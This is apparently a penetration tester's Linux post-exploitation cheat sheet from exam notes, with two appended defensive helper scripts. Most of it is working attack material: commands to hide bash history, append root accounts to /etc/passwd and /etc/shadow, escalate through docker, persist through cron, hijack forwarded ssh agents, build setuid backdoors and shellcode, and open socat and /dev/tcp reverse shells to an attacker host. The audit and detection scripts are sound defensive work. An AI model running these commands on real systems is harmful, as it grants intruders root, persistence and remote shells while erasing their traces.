Last changed: 08.07.2020
Linux post exploitation
This command list was also part of my notes for the Offensive Security Certified Professional exam. It summarizes some useful methods to gather information on a Linux host after having gained command execution.
upgrade shell
To upgrade your shell to a fully functional interactive shell use the following commands (python spawns a pty, CTRL+Z suspends it so the local terminal can be switched to raw mode, fg resumes it):
python -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
reset
bash history
To prevent bash from writing commands after logout you can temporarily unset its HISTFILE or reload the old history before logging out.
unset HISTFILE
history -r
You can also turn off history and delete single entries.
set +o history
history -d -1
If HISTCONTROL is set to ignorespace or ignoreboth, command lines beginning with a space will not be written to the history.
login information
A first step should be to determine which privileges you have and how often the system is accessed by other users.
show user privileges
id
whoami
capsh --print
login history
w
who
last
lastlog
failed logins
utmpdump /var/log/btmp
grep -i fail /var/log/auth.log
system information
distro and kernel info
cat /etc/issue
uname -a
hostname
hostname
hostname -f
running tasks
ps aux
pstree
kill -9 1234
killall ...
installed packages
dpkg -l
yum list installed
pacman -Q
environment variables
env
user management
usernames and password hashes
ls -l /home
cat /etc/passwd
echo "admin:`mkpasswd password`:0:0:admin,,,:/tmp:/bin/bash" >> /etc/passwd
cat /etc/shadow
echo "admin:x:0:0:admin,,,:/root:/bin/bash" >> /etc/passwd
echo "admin:`openssl passwd -6 password`:12345:0:99999:7:::" >> /etc/shadow
unshadow passwd shadow > passwd.unshadow
sudo permissions
sudo -l
cat /etc/sudoers
A nice collection of ways to start a shell from another program can be found on https://gtfobins.github.io/.
gain root with docker
docker container run -v /etc:/tmp/etc -i centos /bin/bash
network configuration
network interfaces
ip l
ip a
routes
ip r
ip r l t 0
ip r a 10.1.1.0/24 via 192.168.11.3
netstat -r
dns server
cat /etc/resolv.conf
open ports
netstat -tunap
ss -tunap
netstat -pelt
firewall rules
iptables -L
iptables -A INPUT -p tcp --dport 4444 -j ACCEPT
enable ssh
/etc/init.d/ssh start
service ssh start
systemctl start ssh
network
network scan
for ip in {1..254}; do arping -w1 -c1 192.168.199.$ip ; done
arp cache
arp -n
ip n
active connections
ss -tun
lsof -nPi
download file
curl -i http://1.2.3.4/
wget http://1.2.3.4/tool.zip
traffic dump
tcpdump -i eth0 udp port 53 -w dns.pcap
tshark -r dns.pcap -Y "dns.flags.response == 0" -T fields -e dns.qry.name
file system
df -h
lsblk -f
mount
mount -o remount,rw,exec /
searching files
grep
grep -rHi "string" /path
find
find /path -type f -exec grep -Hi "string" {} \;
find / -iname '*.bak' -perm -004 -ls 2>/dev/null
find / -type f -amin -60 2>/dev/null
find / -type f -writable 2>/dev/null
find / -type d -writable 2>/dev/null
find / -type f -perm /6000 -ls 2>/dev/null
scheduled tasks
list scheduled scripts
ls /etc/cron.*
cat /etc/crontab
crontab -l
add new task
echo "* * * * * root date >> /tmp/log" >> /etc/crontab
crontab -e
crontab -r
ssh agent hijacking
If someone uses ssh agent forwarding and you can access the forwarded socket, you can use their agent to authenticate.
hijack.sh
#!/bin/bash
while [ ! -e /tmp/ssh* ]; do
sleep 0.1
done
file=$(ls /tmp/ssh*/* | head -n1)
SSH_AUTH_SOCK="${file}" ssh root@localhost
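The defender-side counterpart, added here and not part of the original notes: it audits the two conditions the hijack above depends on, a client that sets ForwardAgent yes and agent socket directories under /tmp that are not mode 0700. Paths are parameters so the checks can run on constructed data; it assumes GNU or busybox coreutils for stat -c.

```shell
#!/bin/bash
# Added audit helper (not from the original notes). Flags the preconditions
# of ssh-agent hijacking so they can be fixed before anyone abuses them.

# Print every uncommented "ForwardAgent yes" line of an ssh client config.
# Mitigation: drop it, scope it to a single Host block, or load keys with
# ssh-add -c so each use of the agent needs interactive confirmation.
check_forward_agent() {
    local cfg="$1"
    grep -Ein '^[[:space:]]*ForwardAgent[[:space:]]+yes' "$cfg" 2>/dev/null |
        sed "s|^|WARN $cfg:|"
}

# sshd creates /tmp/ssh-XXXXXXXX with mode 0700 for a forwarded agent.
# Report any such directory that is reachable by users other than the owner.
check_agent_dirs() {
    local tmpdir="${1:-/tmp}" d mode owner
    for d in "$tmpdir"/ssh-*; do
        [ -d "$d" ] || continue
        mode=$(stat -c '%a' "$d")
        owner=$(stat -c '%U' "$d")
        [ "$mode" = "700" ] && continue
        echo "WARN $d owner=$owner mode=$mode (expected 700)"
    done
}

# Run both checks; return 1 when anything was flagged, 0 when clean.
audit_agent_forwarding() {
    local out
    out=$( { check_forward_agent "$1"; check_agent_dirs "$2"; } )
    [ -n "$out" ] && { printf '%s\n' "$out"; return 1; }
    echo "OK: no agent forwarding exposure found"
}
```

Run it as audit_agent_forwarding ~/.ssh/config /tmp on a jump host; a non-zero exit means a finding was printed.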
network file system
create share
systemctl start nfs-server
echo "/srv/nfs_share *(rw,sync,nohide)" >> /etc/exports
exportfs -var
find and mount
nmap -Pn <network> -p 111,2049
showmount -e <target>
mount -t nfs <target>:/nfs_share /mnt/nfs
squashfs
modify squashfs image
unsquashfs image.file
vim squashfs-root/<file_to_change>
mksquashfs squashfs-root/ new_image.file -noappend -always-use-fragments
selfmade backdoors
setuid.c
#include <unistd.h>
#include <stdlib.h>
/* setuid wrapper: when installed with the setuid bit owned by root,
   it drops into a root shell */
int main(void){
    setuid(0);
    system("/bin/sh");
    return 0;
}
setuid.asm
BITS 32
global _start
section .text
_start:
xor ebx,ebx
lea eax,[ebx+17h]
cdq
int 80h
xor ecx,ecx
push ecx
push 0x68732f6e
push 0x69622f2f
lea eax,[ecx+0bh]
mov ebx,esp
int 80h
compile asm
nasm -f elf setuid.asm
ld -o setuid -melf_i386 setuid.o
compile to shellcode
nasm -f bin setuid.asm -o shellcode
xxd -p shellcode
socat
backdoor
socat tcp-listen:4444,fork,reuseaddr exec:/bin/bash,pty,stderr,setsid,echo=0,raw
socat tcp-connect:<my_ip>:4444,fork,reuseaddr exec:/bin/bash,pty,stderr,setsid,echo=0,raw
file transfer
socat -u tcp-listen:4444,reuseaddr open:<filename>,creat
socat -u tcp-connect:<my_ip>:4444 file:<filename>
bash backconnect
Bash offers a pseudo device, /dev/tcp/<host>/<port>, for creating network connections. The second command is an alternative that does the same as the first.
/bin/bash -i < /dev/tcp/localhost/8888 1>&0 2>&0
/bin/bash -i &> /dev/tcp/localhost/8888 0>&1
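From the defender's side, added here and not part of the original notes: a /dev/tcp backconnect is a plain shell process holding an established TCP socket, typically on fd 0, 1 and 2 because the redirections above wire stdin and stdout to it. The function below reads ss -tunap style output and prints such lines; the column layout (Netid State Recv-Q Send-Q Local Peer Process) and the sample lines are assumptions constructed for the example.

```shell
#!/bin/bash
# Added detection helper (not from the original notes). Hunts for shells
# that own an established TCP socket, which is what the /dev/tcp trick
# above produces. A bash built with --disable-net-redirections has no
# /dev/tcp, but socat, nc or python leave the same footprint, so look
# for the socket-owning shell rather than for the path.

# Read `ss -tunap` lines on stdin, print established TCP sockets owned by
# a shell (sh, bash, dash, zsh, ksh). The regex is anchored on ("name",
# so sshd and ssh do not match.
flag_shell_sockets() {
    awk '
        $1 == "tcp" && $2 == "ESTAB" && $7 ~ /\("(ba|da|z|k)?sh",/ {
            printf "SUSPICIOUS %s -> %s %s\n", $5, $6, $7
        }
    '
}

# Constructed sample (not captured from a real host): one interactive bash
# connected to a remote port, one legitimate sshd session, one UDP entry.
SAMPLE_SS='Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp   ESTAB  0      0      10.0.0.5:41234     192.168.11.3:8888 users:(("bash",pid=4242,fd=0),("bash",pid=4242,fd=1),("bash",pid=4242,fd=2))
tcp   ESTAB  0      0      10.0.0.5:22        10.0.0.9:51000    users:(("sshd",pid=900,fd=4))
udp   UNCONN 0      0      0.0.0.0:68         0.0.0.0:*         users:(("dhclient",pid=512,fd=6))'

# Number of suspicious lines in the sample; live use: ss -tunap | flag_shell_sockets
count_suspicious() {
    printf '%s\n' "$SAMPLE_SS" | flag_shell_sockets | wc -l
}
```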
xserver backconnect
To connect graphical applications to your local xserver you can use Xnest
Xnest :1
or configure x11 to allow inbound tcp connections and reboot.
/etc/gdm/custom.conf
[security]
DisallowTCP=false
In both cases you have to disable access control with
xhost +
On the victim you can start
xterm -display <target-ip>:1